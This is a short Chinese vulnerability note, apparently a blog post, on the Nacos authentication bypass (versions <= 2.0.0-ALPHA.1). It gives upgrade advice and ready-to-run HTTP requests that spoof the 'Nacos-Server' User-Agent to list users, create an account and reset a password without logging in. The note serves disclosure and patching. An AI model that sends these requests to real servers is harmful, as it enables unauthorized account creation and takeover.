发布于 更新于
AI总结: 本文介绍了Alibaba Nacos的权限认证绕过漏洞,影响版本为Nacos <= 2.0.0-ALPHA.1。官方已发布安全版本,建议用户下载或升级至最新版本以修复该漏洞。相关的API请求示例包括查询用户、创建用户和重置密码的操作。
优化建议:
1. 增加对漏洞影响的详细描述,包括可能导致的安全风险和后果。
2. 提供更具体的升级步骤,帮助用户更顺利地进行版本更新。
3. 在相关链接中添加更多参考资料,帮助用户更深入了解漏洞背景和修复方法。
4. 可以考虑提供示例代码的安全性分析,帮助用户理解如何安全地使用API。
## 影响版本: Nacos <= 2.0.0-ALPHA.1
## 修复建议: 官方已发布安全版本,建议下载或升级至最新版本
## 相关链接: https://www.freebuf.com/vuls/263845.html
@nacos=http://127.0.0.1:8849/nacos
### 查询用户
GET {{nacos}}/v1/auth/users?pageNo=1&pageSize=10
User-Agent: Nacos-Server
### 创建用户
POST {{nacos}}/v1/auth/users
User-Agent: Nacos-Server
Content-Type: application/x-www-form-urlencoded
username=demo&password=demo
### 密码重置
PUT {{nacos}}/v1/auth/users
User-Agent: Nacos-Server
Content-Type: application/x-www-form-urlencoded
username=demo&newPassword=demodemo